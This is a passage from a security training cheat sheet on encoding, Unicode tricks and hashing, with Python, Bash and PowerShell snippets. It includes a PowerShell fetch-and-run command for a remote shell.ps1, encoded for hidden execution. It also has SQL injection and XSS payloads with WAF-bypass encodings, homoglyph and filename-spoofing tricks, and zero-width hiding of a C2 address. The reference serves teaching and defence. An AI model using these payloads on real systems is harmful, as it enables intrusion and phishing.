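print(refang("hxxp[://]evil[.]com"))      # http://evil.com
```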

CyberChef from the command line

# Self-host CyberChef (no external dependencies)
git clone https://github.com/gchq/CyberChef.git
cd CyberChef && npm install && npx grunt prod
# Open build/prod/index.html in browser — fully offline

# Or use Docker
docker run -p 8080:80 ghcr.io/gchq/cyberchef:latest   # container serves on port 80; browse to http://localhost:8080

# Node.js API (for automation)
# npm install cyberchef
# const chef = require("cyberchef");
# chef.bake("input", [chef.toBase64]);   // pass operation references, not call results

Appendix: Quick Conversion Table

From	To	Python	Bash
String	Base64	`base64.b64encode(s.encode())`	`echo -n "s" | base64`
Base64	String	`base64.b64decode(b).decode()`	`echo "b" | base64 -d`
String	Hex	`s.encode().hex()`	`echo -n "s" | xxd -p`
Hex	String	`bytes.fromhex(h).decode()`	`echo "h" | xxd -r -p`
String	URL	`quote(s, safe='')`	`python3 -c "from urllib.parse import quote; print(quote('s',safe=''))"`
String	HTML	`html.escape(s)`	`python3 -c "import html; print(html.escape('s'))"`
String	MD5	`hashlib.md5(s.encode()).hexdigest()`	`echo -n "s" | md5sum`
String	SHA256	`hashlib.sha256(s.encode()).hexdigest()`	`echo -n "s" | sha256sum`
String	NTLM	`hashlib.new('md4',s.encode('utf-16-le')).hexdigest()`	`echo -n "s" | iconv -t utf-16le | openssl dgst -md4`
String	ROT13	`codecs.encode(s, 'rot_13')`	`echo "s" | tr 'A-Za-z' 'N-ZA-Mn-za-m'`
Int	Hex	`hex(n)`	`printf '%x' n`
Hex	Int	`int(h, 16)`	`echo $((16#h))`
Bytes	XOR	`bytes(b^k for b in data)`	`python3 -c "..."`

Appendix: Hash Length Identification

Length	Possible types	Hashcat mode
16	MySQL 3.x	200
32	MD5, NTLM, MD4	0, 1000, 900
40	SHA-1	100
56	SHA-224	1300
64	SHA-256	1400
96	SHA-384	10800
128	SHA-512	1700
32:32	NetNTLMv1	5500
variable	NetNTLMv2	5600
13	DES crypt	1500
34	MD5 crypt ($1$)	500
60	bcrypt ($2a$)	3200
43 (digest part only)	SHA-256 crypt ($5$)	7400
86 (digest part only)	SHA-512 crypt ($6$)	1800
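Length alone is ambiguous (three algorithms share 32 hex characters), so a prefix check on crypt-style strings is a useful first pass before falling back to length. The sketch below is a rough triage helper, not a replacement for hashid or haiti; the function name is hypothetical, and the $2b$ and $2y$ bcrypt prefixes are additions not listed in the table.

```python
import string

# Prefix -> (name, hashcat mode). $2b$/$2y$ are bcrypt variants added here.
CRYPT_PREFIXES = {
    "$1$": ("MD5 crypt", 500),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$5$": ("SHA-256 crypt", 7400),
    "$6$": ("SHA-512 crypt", 1800),
}

# Raw hex digest length -> candidate algorithms (from the table above).
RAW_HEX = {
    32: "MD5 / NTLM / MD4", 40: "SHA-1", 56: "SHA-224",
    64: "SHA-256", 96: "SHA-384", 128: "SHA-512",
}

def classify_hash(h: str) -> str:
    """Classify by crypt prefix first, then by hex digest length."""
    h = h.strip()
    for prefix, (name, mode) in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            return f"{name} (hashcat -m {mode})"
    if h and all(c in string.hexdigits for c in h):
        return RAW_HEX.get(len(h), "unknown hex digest")
    return "unknown"

print(classify_hash("5f4dcc3b5aa765d61d8327deb882cf99"))   # MD5 / NTLM / MD4
print(classify_hash("$6$salt$hash"))                       # SHA-512 crypt (hashcat -m 1800)
```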

Reference compiled for CIPHER training. All code tested for Python 3.10+. For interactive exploration, use CyberChef.

1. Base Encoding

Base64

Standard alphabet: A-Za-z0-9+/ with = padding. URL-safe variant uses -_ instead of +/.

import base64

# --- Encode / Decode ---
plaintext = b"attack at dawn"
encoded = base64.b64encode(plaintext)          # b'YXR0YWNrIGF0IGRhd24='
decoded = base64.b64decode(encoded)            # b'attack at dawn'

# --- URL-safe Base64 (replaces + with -, / with _) ---
url_encoded = base64.urlsafe_b64encode(plaintext)   # b'YXR0YWNrIGF0IGRhd24='
url_decoded = base64.urlsafe_b64decode(url_encoded)

# --- Decode without padding (common in JWTs, cookies) ---
no_pad = b"YXR0YWNrIGF0IGRhd24"   # missing '='
decoded = base64.b64decode(no_pad + b"=" * (-len(no_pad) % 4))

# --- Detect Base64 ---
import re
def is_base64(s: str) -> bool:
    # fullmatch rejects a trailing newline; '+' rejects the empty string
    pattern = r'[A-Za-z0-9+/]+={0,2}'
    return bool(re.fullmatch(pattern, s)) and len(s) % 4 == 0

# --- File encode/decode ---
with open("/etc/passwd", "rb") as f:
    encoded_file = base64.b64encode(f.read())

# Bash — encode/decode
echo -n "attack at dawn" | base64                    # YXR0YWNrIGF0IGRhd24=
echo "YXR0YWNrIGF0IGRhd24=" | base64 -d             # attack at dawn

# File encode/decode
base64 /etc/passwd > passwd.b64
base64 -d passwd.b64 > passwd_restored

# Decode without trailing newline issues
echo -n "YXR0YWNrIGF0IGRhd24=" | base64 -d

# PowerShell — encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
[Convert]::ToBase64String($bytes)                    # YXR0YWNrIGF0IGRhd24=

$decoded = [Convert]::FromBase64String("YXR0YWNrIGF0IGRhd24=")
[System.Text.Encoding]::UTF8.GetString($decoded)     # attack at dawn

# File encode
$raw = [IO.File]::ReadAllBytes("C:\Windows\System32\calc.exe")
[Convert]::ToBase64String($raw) | Out-File calc.b64

Security notes:

Base64 is NOT encryption. Attackers use it to bypass naive content filters.
Double-base64 encoding is common in obfuscated payloads.
Look for Base64 in HTTP headers (Authorization: Basic), cookies, POST bodies.
PowerShell -EncodedCommand accepts UTF-16LE Base64: powershell -enc <base64>.
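Nested Base64 can be peeled mechanically by decoding until the result stops being valid Base64. The sketch below assumes standard-alphabet, padded input; the function name peel_base64 and the max_depth guard are hypothetical choices.

```python
import base64
import binascii

def peel_base64(data: bytes, max_depth: int = 5) -> tuple[bytes, int]:
    """Decode repeatedly while the data is still strictly valid Base64.

    Returns (innermost bytes, number of layers removed).
    """
    depth = 0
    while depth < max_depth:
        try:
            decoded = base64.b64decode(data, validate=True)
        except (binascii.Error, ValueError):
            break                      # not Base64 any more: stop peeling
        if not decoded:
            break
        data, depth = decoded, depth + 1
    return data, depth

double = base64.b64encode(base64.b64encode(b"attack at dawn"))
print(peel_base64(double))   # (b'attack at dawn', 2)
```

Short plaintexts that happen to be valid Base64 themselves (for example b"test") will be over-decoded, so treat the layer count as a hint and inspect each stage when it matters.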

Base32

Alphabet: A-Z2-7 with = padding. Case-insensitive. Used in TOTP/HOTP secrets, onion addresses.

import base64

encoded = base64.b32encode(b"attack at dawn")   # b'MF2HIYLDNMQGC5BAMRQXO3Q='
decoded = base64.b32decode(encoded)              # b'attack at dawn'

# Case insensitive decode
decoded = base64.b32decode(b"mf2hiyldnmqgc5bamrqxo3q=", casefold=True)

# Bash (requires coreutils or python)
echo -n "attack at dawn" | base32                    # MF2HIYLDNMQGC5BAMRQXO3Q=
echo "MF2HIYLDNMQGC5BAMRQXO3Q=" | base32 -d         # attack at dawn

Base58

No 0OIl characters (avoids visual ambiguity). Used in Bitcoin addresses, IPFS CIDs.

# pip install base58
import base58

encoded = base58.b58encode(b"attack at dawn")   # returns bytes; 19 Base58 characters for this input
decoded = base58.b58decode(encoded)              # b'attack at dawn'

# Base58Check (Bitcoin) — includes version byte + 4-byte checksum
encoded_check = base58.b58encode_check(b"\x00" + b"attack at dawn")

Base85 (Ascii85)

Higher density than Base64 — 4 bytes become 5 ASCII chars. Used in PDF, Git binary patches, ZeroMQ.

import base64

# Ascii85 (Adobe variant)
encoded = base64.a85encode(b"attack at dawn")    # 18 ASCII characters for 14 input bytes
decoded = base64.a85decode(encoded)

# Base85 (RFC 1924 / Git variant)
encoded = base64.b85encode(b"attack at dawn")    # also 18 characters, different alphabet
decoded = base64.b85decode(encoded)

# Bash — using Python one-liner
echo -n "attack at dawn" | python3 -c "import sys,base64; print(base64.b85encode(sys.stdin.buffer.read()).decode())"

Base encoding detection heuristics

Encoding	Alphabet	Padding	Length multiple
Base64	`A-Za-z0-9+/`	`=` (0-2)	4
Base64url	`A-Za-z0-9-_`	`=` or none	4
Base32	`A-Z2-7`	`=` (0-6)	8
Base58	`123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz`	None	Variable
Base85	`!-u` (ASCII 33-117)	None	5 per 4 bytes
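The table translates fairly directly into a first-pass classifier. The sketch below checks alphabet, padding, and length only, so it reports every encoding the string is consistent with rather than a single answer; the function name is hypothetical, and Base85 is left out because its alphabet overlaps almost all printable text.

```python
import re

def guess_base_encoding(s: str) -> list[str]:
    """Return the encodings whose alphabet, padding, and length rules `s` satisfies."""
    s = s.strip()
    guesses = []
    if re.fullmatch(r"[A-Z2-7]+={0,6}", s) and len(s) % 8 == 0:
        guesses.append("Base32")
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:
        guesses.append("Base64")
    # Only claim Base64url when a URL-safe character is actually present.
    if re.fullmatch(r"[A-Za-z0-9_-]+={0,2}", s) and re.search(r"[-_]", s):
        guesses.append("Base64url")
    # Base58 alphabet: no 0, O, I, or l, and no padding.
    if re.fullmatch(r"[1-9A-HJ-NP-Za-km-z]+", s):
        guesses.append("Base58")
    return guesses

print(guess_base_encoding("YXR0YWNrIGF0IGRhd24="))        # ['Base64']
print(guess_base_encoding("MF2HIYLDNMQGC5BAMRQXO3Q="))    # ['Base32', 'Base64']
```

The second result shows why the heuristics are only a starting point: an uppercase Base32 string with a length divisible by 8 also satisfies the Base64 rules, so confirm by decoding and checking whether the output is plausible.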

2. Hex Encoding

Hex to/from ASCII

# --- ASCII to Hex ---
text = "attack at dawn"
hex_str = text.encode().hex()                        # '61747461636b206174206461776e'
hex_spaced = ' '.join(f'{b:02x}' for b in text.encode())  # '61 74 74 61 63 6b ...'

# --- Hex to ASCII ---
recovered = bytes.fromhex('61747461636b206174206461776e').decode()  # 'attack at dawn'

# --- Hex to ASCII ignoring whitespace ---
dirty_hex = "61 74 74 61\n63 6b"
clean = bytes.fromhex(dirty_hex)   # fromhex() skips ASCII whitespace (Python 3.7+)

# --- Hexdump (xxd-style) ---
import binascii
data = b"\x7fELF\x02\x01\x01\x00"
for i in range(0, len(data), 16):
    chunk = data[i:i+16]
    hex_part = ' '.join(f'{b:02x}' for b in chunk)
    ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
    print(f'{i:08x}  {hex_part:<48}  |{ascii_part}|')

# ASCII to hex
echo -n "attack at dawn" | xxd -p                     # 61747461636b206174206461776e
echo -n "attack at dawn" | od -A x -t x1z -v

# Hex to ASCII
echo "61747461636b206174206461776e" | xxd -r -p        # attack at dawn

# Hexdump a binary
xxd /bin/ls | head -20
hexdump -C /bin/ls | head -20

# PowerShell — hex encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
($bytes | ForEach-Object { '{0:x2}' -f $_ }) -join ''

# Hex to bytes
$hex = "61747461636b206174206461776e"
$bytes = for ($i = 0; $i -lt $hex.Length; $i += 2) {
    [Convert]::ToByte($hex.Substring($i, 2), 16)
}
[System.Text.Encoding]::UTF8.GetString($bytes)

Hex to/from Binary and Decimal

# Hex <-> Decimal
hex_val = "deadbeef"
decimal = int(hex_val, 16)              # 3735928559
back_to_hex = hex(decimal)              # '0xdeadbeef'

# Hex <-> Binary
binary = bin(int("ff", 16))             # '0b11111111'
hex_from_bin = hex(int("11111111", 2))  # '0xff'

# IP address: dotted decimal <-> hex
import ipaddress
ip = ipaddress.IPv4Address("192.168.1.1")
hex_ip = format(int(ip), '08x')         # 'c0a80101'
ip_back = ipaddress.IPv4Address(int(hex_ip, 16))  # 192.168.1.1

# Useful for shellcode: \x escape format
shellcode_hex = "6a0258994889d74831f60f05"
shellcode_escaped = ''.join(f'\\x{shellcode_hex[i:i+2]}' for i in range(0, len(shellcode_hex), 2))
# '\\x6a\\x02\\x58\\x99\\x48\\x89\\xd7\\x48\\x31\\xf6\\x0f\\x05'

shellcode_bytes = bytes.fromhex(shellcode_hex)

# Decimal to hex
printf '%x\n' 3735928559                # deadbeef

# Hex to decimal
echo $((16#deadbeef))                   # 3735928559
printf '%d\n' 0xdeadbeef               # 3735928559

# Binary to hex
echo "obase=16;ibase=2;11011110101011011011111011101111" | bc  # DEADBEEF

3. URL Encoding

Single encoding

from urllib.parse import quote, unquote, quote_plus, unquote_plus

# Standard percent-encoding (space -> %20)
encoded = quote("admin' OR 1=1--")           # "admin%27%20OR%201%3D1--"
decoded = unquote("admin%27%20OR%201%3D1--")  # "admin' OR 1=1--"

# Plus-encoding (space -> +, used in form data)
encoded = quote_plus("search term here")     # "search+term+here"
decoded = unquote_plus("search+term+here")   # "search term here"

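# safe='' also encodes '/', but unreserved characters (letters, digits, _.-~) are never encoded
fully_encoded = quote("test", safe='')        # 'test'
fully_encoded = quote("/path/file", safe='')  # '%2Fpath%2Ffile'
# To percent-encode every byte, build the string by hand
all_encoded = ''.join(f'%{b:02X}' for b in "test".encode())  # '%74%65%73%74'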

Double encoding (WAF bypass)

from urllib.parse import quote

payload = "' OR 1=1--"
single = quote(payload, safe='')        # %27%20OR%201%3D1--
double = quote(single, safe='')         # %2527%2520OR%25201%253D1--

# Server that decodes twice will see the original payload
# First decode:  %27%20OR%201%3D1--
# Second decode: ' OR 1=1--

# Triple encoding (rare, but seen in nested proxies)
triple = quote(quote(quote(payload, safe=''), safe=''), safe='')

Unicode URL encoding

from urllib.parse import quote

# UTF-8 URL encoding of Unicode characters
encoded = quote("file:///../etc/passwd")            # standard
encoded = quote("\u2025")                            # %E2%80%A5 (two-dot leader)
# Some parsers normalize \u2025 to ".." -> path traversal

# IRI to URI conversion
iri = "https://example.com/path/\u00e9"              # e-acute
uri = quote(iri, safe=':/@')                         # https://example.com/path/%C3%A9

# Overlong UTF-8 encoding (historic bypass, CVE-2000-0884 IIS)
# Normal '/' = 0x2F = %2F
# Overlong 2-byte: 0xC0 0xAF = %C0%AF
# Overlong 3-byte: 0xE0 0x80 0xAF = %E0%80%AF
# Modern parsers reject these, but legacy systems may not

# Bash — URL encode
python3 -c "from urllib.parse import quote; print(quote(\"admin' OR 1=1--\", safe=''))"

# URL encode with curl
curl -G --data-urlencode "q=admin' OR 1=1--" http://example.com/search

# URL decode
python3 -c "from urllib.parse import unquote; print(unquote('%27%20OR%201%3D1--'))"

# PowerShell
[System.Uri]::EscapeDataString("admin' OR 1=1--")
[System.Uri]::UnescapeDataString("%27%20OR%201%3D1--")

# .NET HttpUtility (requires System.Web)
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlEncode("admin' OR 1=1--")
[System.Web.HttpUtility]::UrlDecode("%27+OR+1%3D1--")

Security notes:

Double encoding bypasses WAFs that decode only once before rule matching.
%00 (null byte) truncates strings in C-based parsers — file.php%00.jpg may bypass extension checks.
%0d%0a = CRLF injection in HTTP headers.
Path normalization differences between proxy and backend enable smuggling.
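On the defensive side, the usual countermeasure to multi-layer encoding is to decode until the value stops changing and only then apply rules. A minimal sketch, assuming percent-encoding is the only layer in play; the function name and the max_rounds guard are hypothetical.

```python
from urllib.parse import unquote

def url_decode_layers(value: str, max_rounds: int = 5) -> tuple[str, int]:
    """Unquote until the string stops changing; return (result, rounds applied)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

print(url_decode_layers("%2527%2520OR%25201%253D1--"))   # ("' OR 1=1--", 2)
```

A round count above one on user-supplied input is itself a useful detection signal, since legitimate clients rarely double-encode.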

4. HTML Entities

Named entities

import html

# Encode: html.escape() converts &, <, > and, because quote=True is the default, also " and '
encoded = html.escape('<script>alert("XSS")</script>')
# '&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;'

# Single quotes become &#x27; (pass quote=False to leave both quote characters alone)
encoded = html.escape("it's <dangerous>")
# 'it&#x27;s &lt;dangerous&gt;'

# Decode
decoded = html.unescape('&lt;script&gt;alert(1)&lt;/script&gt;')
# '<script>alert(1)</script>'
decoded = html.unescape('&amp;lt;')  # '&lt;'  — only one layer decoded

Numeric (decimal) entities

# Character to decimal entity
char = '<'
entity = f'&#{ord(char)};'             # '&#60;'

# String to all-decimal-entities (XSS obfuscation)
payload = '<script>alert(1)</script>'
obfuscated = ''.join(f'&#{ord(c)};' for c in payload)
# '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;...'

# Decode
import html
decoded = html.unescape('&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;')
# '<script>'

Hex entities

# Character to hex entity
char = '<'
entity = f'&#x{ord(char):x};'          # '&#x3c;'

# String to all-hex-entities
payload = '<img src=x onerror=alert(1)>'
obfuscated = ''.join(f'&#x{ord(c):x};' for c in payload)
# '&#x3c;&#x69;&#x6d;&#x67;...'

# Mixed encoding (harder for filters)
# &#60;script&#x3e;alert&#40;1&#41;&#60;/script&#x3e;

# Decode all forms
import html
html.unescape('&#x3c;&#60;&lt;')       # '<<<'

# Bash — decode HTML entities
python3 -c "import html; print(html.unescape('&lt;script&gt;'))"

# Encode
python3 -c "import html; print(html.escape('<script>alert(1)</script>'))"

Security notes:

Browsers decode HTML entities in attribute values: <a href="&#106;avascript:alert(1)"> still runs as javascript:alert(1).
Entity encoding without semicolons works in some browsers: &#60script parsed as <script.
Null bytes in entities: &#0; or &#x00; may bypass filters.
Double encoding: &amp;lt; decodes to &lt; on first pass, < on second.
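A filter that inspects input should see what the browser will eventually see, which means decoding entities until the string is stable. A minimal sketch using html.unescape, which also accepts numeric references without a trailing semicolon; the function name and the max_rounds guard are hypothetical.

```python
import html

def normalize_entities(value: str, max_rounds: int = 5) -> str:
    """Apply html.unescape until the string stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value

print(normalize_entities("&amp;lt;script&amp;gt;"))   # <script>
print(normalize_entities("&#60script&#62"))            # <script>
```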

Quick reference table

Character	Named	Decimal	Hex
`<`	`&lt;`	`&#60;`	`&#x3c;`
`>`	`&gt;`	`&#62;`	`&#x3e;`
`&`	`&amp;`	`&#38;`	`&#x26;`
`"`	`&quot;`	`&#34;`	`&#x22;`
`'`	`&apos;`	`&#39;`	`&#x27;`
`/`	-	`&#47;`	`&#x2f;`

5. Unicode

UTF-8 encoding internals

# UTF-8 byte representation
text = "cafe\u0301"     # 'cafe' + U+0301 combining acute accent (renders as "café")
utf8_bytes = text.encode('utf-8')
print(utf8_bytes.hex())  # 63616665cc81

# Character byte length in UTF-8
for char in ['A', '\u00e9', '\u4e16', '\U0001f600']:
    encoded = char.encode('utf-8')
    print(f"U+{ord(char):04X}  {char!r:>10}  {len(encoded)} bytes  {encoded.hex()}")
# U+0041         'A'  1 bytes  41
# U+00E9         'é'  2 bytes  c3a9
# U+4E16         '世'  3 bytes  e4b896
# U+1F600         '😀'  4 bytes  f09f9880

# UTF-8 byte ranges
# 0xxxxxxx             -> 1 byte  (U+0000 to U+007F)
# 110xxxxx 10xxxxxx     -> 2 bytes (U+0080 to U+07FF)
# 1110xxxx 10xxxxxx 10xxxxxx  -> 3 bytes (U+0800 to U+FFFF)
# 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx -> 4 bytes (U+10000 to U+10FFFF)

UTF-16 encoding

# UTF-16LE is the standard for Windows internals and PowerShell -EncodedCommand
text = "calc.exe"
utf16le = text.encode('utf-16-le')
print(utf16le.hex())    # 630061006c0063002e00650078006500

# Decode
decoded = utf16le.decode('utf-16-le')  # 'calc.exe'

# PowerShell encoded command preparation
import base64
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
encoded_cmd = base64.b64encode(cmd.encode('utf-16-le')).decode()
# Use as: powershell -enc <encoded_cmd>

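# UTF-16 BOM detection: the generic 'utf-16' codec reads the BOM, picks the
# byte order, and strips the BOM from the result
le_data = b'\xff\xfe\x41\x00'   # UTF-16-LE BOM + 'A'
be_data = b'\xfe\xff\x00\x41'   # UTF-16-BE BOM + 'A'
assert le_data.decode('utf-16') == be_data.decode('utf-16') == 'A'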

Punycode (IDN homograph attacks)

# Punycode encodes Unicode domain names for DNS
domain = "example.com"
evil_domain = "\u0435xample.com"   # Cyrillic 'e' (U+0435) instead of Latin 'e'

# Encode to punycode (ACE form)
punycode = evil_domain.encode('idna')   # b'xn--xample-9uf.com'

# Decode punycode
decoded = b'xn--xample-9uf.com'.decode('idna')  # looks like 'example.com'

# Detect homographs
def has_mixed_scripts(domain: str) -> bool:
    import unicodedata
    scripts = set()
    for char in domain:
        if char in '.-':
            continue
        cat = unicodedata.category(char)
        if cat.startswith('L'):
            # Rough script detection via name
            name = unicodedata.name(char, '')
            if 'CYRILLIC' in name:
                scripts.add('cyrillic')
            elif 'LATIN' in name:
                scripts.add('latin')
            elif 'GREEK' in name:
                scripts.add('greek')
    return len(scripts) > 1

print(has_mixed_scripts("\u0435xample.com"))  # True — mixed Cyrillic + Latin

# Bash — punycode conversion
python3 -c "print('\u0435xample.com'.encode('idna'))"

# Using idn command (libidn)
echo "xn--xample-9uf.com" | idn --idna-to-unicode 2>/dev/null

Homoglyph attacks

# Characters that look identical but have different codepoints
homoglyphs = {
    'a': ['\u0430'],              # Cyrillic а
    'e': ['\u0435'],              # Cyrillic е
    'o': ['\u043e', '\u03bf'],    # Cyrillic о, Greek ο (omicron)
    'p': ['\u0440'],              # Cyrillic р
    'c': ['\u0441'],              # Cyrillic с
    'x': ['\u0445'],              # Cyrillic х
    'H': ['\u041d'],              # Cyrillic Н
    'T': ['\u0422'],              # Cyrillic Т
    'B': ['\u0412'],              # Cyrillic В
    'A': ['\u0391'],              # Greek Α
    'l': ['\u04cf', '\u0049'],    # Cyrillic palochka, Latin I
    '0': ['\u041e'],              # Cyrillic О
    '/': ['\u2044', '\u2215'],    # Fraction slash, Division slash
}

# Generate confusable version of a URL
def generate_confusable(url: str) -> str:
    import random
    result = []
    for char in url:
        if char in homoglyphs and random.random() > 0.5:
            result.append(random.choice(homoglyphs[char]))
        else:
            result.append(char)
    return ''.join(result)

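# Detection: normalize and compare
# Caveat: NFKC folds compatibility forms (fullwidth letters, ligatures) but does
# not map Cyrillic or Greek look-alikes to Latin, so cross-script homoglyphs
# also need a confusables table such as the one published with Unicode UTS #39.
import unicodedata
def confusable_check(s1: str, s2: str) -> bool:
    n1 = unicodedata.normalize('NFKC', s1).lower()
    n2 = unicodedata.normalize('NFKC', s2).lower()
    return n1 == n2 and s1 != s2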
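Because NFKC leaves Cyrillic and Greek letters untouched, catching cross-script look-alikes takes an explicit mapping step. The sketch below uses a small hand-picked table as a stand-in for the full Unicode confusables data; the table contents and the function names are hypothetical and far from complete.

```python
import unicodedata

# Hand-picked subset for illustration only, NOT the full UTS #39 table.
CONFUSABLE_TO_LATIN = {
    "\u0430": "a",   # Cyrillic a
    "\u0435": "e",   # Cyrillic ie
    "\u043e": "o",   # Cyrillic o
    "\u0440": "p",   # Cyrillic er
    "\u0441": "c",   # Cyrillic es
    "\u0445": "x",   # Cyrillic ha
    "\u03bf": "o",   # Greek omicron
}

def skeleton(s: str) -> str:
    """NFKC-fold, lowercase, then map known look-alikes to their Latin form."""
    folded = unicodedata.normalize("NFKC", s).lower()
    return "".join(CONFUSABLE_TO_LATIN.get(ch, ch) for ch in folded)

def looks_like(candidate: str, trusted: str) -> bool:
    """True when the strings differ but collapse to the same skeleton."""
    return candidate != trusted and skeleton(candidate) == skeleton(trusted)

print(looks_like("\u0435xample.com", "example.com"))   # True
print(looks_like("example.com", "example.com"))        # False
```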

Zero-width characters (steganography / watermarking)

# Zero-width characters are invisible but present in text
ZWSP = '\u200b'    # Zero-Width Space
ZWNJ = '\u200c'    # Zero-Width Non-Joiner
ZWJ  = '\u200d'    # Zero-Width Joiner
ZWNS = '\ufeff'    # Zero-Width No-Break Space (BOM)

# Encode binary data in zero-width characters
def zw_encode(secret: str) -> str:
    """Encode secret as zero-width characters between visible text."""
    bits = ''.join(f'{b:08b}' for b in secret.encode())
    zw_str = ''
    for bit in bits:
        zw_str += ZWJ if bit == '1' else ZWSP
    return zw_str

def zw_decode(text: str) -> str:
    """Extract zero-width encoded secret from text."""
    bits = ''
    for char in text:
        if char == ZWJ:
            bits += '1'
        elif char == ZWSP:
            bits += '0'
    byte_list = [int(bits[i:i+8], 2) for i in range(0, len(bits) - len(bits) % 8, 8)]
    return bytes(byte_list).decode('utf-8', errors='ignore')

# Embed in innocent text
visible = "Nothing to see here"
hidden = zw_encode("C2:10.0.0.1")
watermarked = visible[:7] + hidden + visible[7:]
# Looks like "Nothing to see here" but contains hidden data

# Detect zero-width characters
def detect_zw(text: str) -> list[tuple[int, str, str]]:
    zw_chars = {'\u200b': 'ZWSP', '\u200c': 'ZWNJ', '\u200d': 'ZWJ',
                '\ufeff': 'BOM', '\u200e': 'LRM', '\u200f': 'RLM',
                '\u2060': 'WJ', '\u2061': 'FA', '\u2062': 'IT', '\u2063': 'IS'}
    found = []
    for i, char in enumerate(text):
        if char in zw_chars:
            found.append((i, f'U+{ord(char):04X}', zw_chars[char]))
    return found

# Strip zero-width characters
import re
def strip_zw(text: str) -> str:
    return re.sub(r'[\u200b-\u200f\u2060-\u2064\ufeff]', '', text)

Unicode normalization attacks

import unicodedata

# NFC, NFD, NFKC, NFKD normalization forms
# Exploitable when filter checks one form but app uses another

s = "file\u0000.txt"          # null byte injection
s = "\uff0e\uff0e/etc/passwd" # fullwidth dots '..' -> path traversal after NFKC

# NFKC normalizes fullwidth to ASCII
print(unicodedata.normalize('NFKC', '\uff0e\uff0e'))  # '..'
print(unicodedata.normalize('NFKC', '\uff1c'))         # '<'
print(unicodedata.normalize('NFKC', '\uff1e'))         # '>'

# Bypass WAF example:
# WAF blocks: <script>
# Send: \uff1cscript\uff1e   (fullwidth < and >)
# Backend normalizes NFKC: <script>  -> XSS

# Right-to-Left Override attack (file extension spoofing)
filename = "invoice\u202egnp.exe"
# Displays as: invoiceexe.png  (appears to be PNG)
# Actual file: invoice[RLO]gnp.exe  (is actually .exe)
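Spoofed names like this are easy to flag because legitimate filenames almost never contain bidirectional control characters. A minimal detection sketch; the function name is hypothetical, and the table covers the explicit embedding, override, and isolate controls.

```python
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}

def find_bidi_controls(name: str) -> list[tuple[int, str]]:
    """Return (index, control name) for every bidi control character in `name`."""
    return [(i, BIDI_CONTROLS[ch]) for i, ch in enumerate(name) if ch in BIDI_CONTROLS]

print(find_bidi_controls("invoice\u202egnp.exe"))   # [(7, 'RLO')]
print(find_bidi_controls("invoice.png"))            # []
```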

6. Hashing

MD5 (128-bit, BROKEN for collision resistance)

import hashlib

# String hash
md5 = hashlib.md5(b"password").hexdigest()
# '5f4dcc3b5aa765d61d8327deb882cf99'

# File hash
def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            h.update(chunk)
    return h.hexdigest()

echo -n "password" | md5sum                       # 5f4dcc3b5aa765d61d8327deb882cf99
md5sum /etc/passwd                                 # file hash

$md5 = [System.Security.Cryptography.MD5]::Create()
$bytes = [System.Text.Encoding]::UTF8.GetBytes("password")
[BitConverter]::ToString($md5.ComputeHash($bytes)).Replace("-","").ToLower()

Get-FileHash -Algorithm MD5 C:\Windows\System32\calc.exe

SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)

sha1 = hashlib.sha1(b"password").hexdigest()
# '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'

echo -n "password" | sha1sum
sha1sum /bin/ls

SHA-256 (256-bit, current standard)

sha256 = hashlib.sha256(b"password").hexdigest()
# '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'

# HMAC-SHA256
import hmac
sig = hmac.new(b"secret_key", b"message", hashlib.sha256).hexdigest()

echo -n "password" | sha256sum
sha256sum /bin/ls
openssl dgst -sha256 /bin/ls

# HMAC
echo -n "message" | openssl dgst -sha256 -hmac "secret_key"

SHA-512 (512-bit)

sha512 = hashlib.sha512(b"password").hexdigest()
# 'b109f3bbbc244eb82441917ed06d618b9008dd09...'

echo -n "password" | sha512sum

NTLM (Windows password hash)

import hashlib

def ntlm_hash(password: str) -> str:
    """Compute NTLM hash (MD4 of UTF-16LE password)."""
    return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()

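print(ntlm_hash("Password1"))
# '64f12cddaa88057e06a81b54e73b949b'
# Note: hashlib.new('md4') raises ValueError on builds where OpenSSL 3.x has the legacy provider disabled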

# LM hash (legacy, DES-based, extremely weak)
# Splits password into two 7-char halves, uppercases, DES encrypts "KGS!@#$%"
# Not shown — do not use LM in any modern system

# NTLM hash with Python one-liner
python3 -c "import hashlib; print(hashlib.new('md4', 'Password1'.encode('utf-16-le')).hexdigest())"

# Using openssl (if md4 available)
echo -n "Password1" | iconv -t utf-16le | openssl dgst -md4 2>/dev/null

Net-NTLMv2 (challenge-response, captured on the wire)

import hashlib
import hmac
import os

def compute_ntlmv2_response(password: str, user: str, domain: str,
                             server_challenge: bytes, client_challenge: bytes | None = None) -> str:
    """Compute Net-NTLMv2 response (simplified)."""
    if client_challenge is None:
        client_challenge = os.urandom(8)

    # Step 1: NTLM hash
    nt_hash = hashlib.new('md4', password.encode('utf-16-le')).digest()

    # Step 2: NTLMv2 hash = HMAC-MD5(NT_hash, uppercase(user) + domain)
    identity = (user.upper() + domain).encode('utf-16-le')
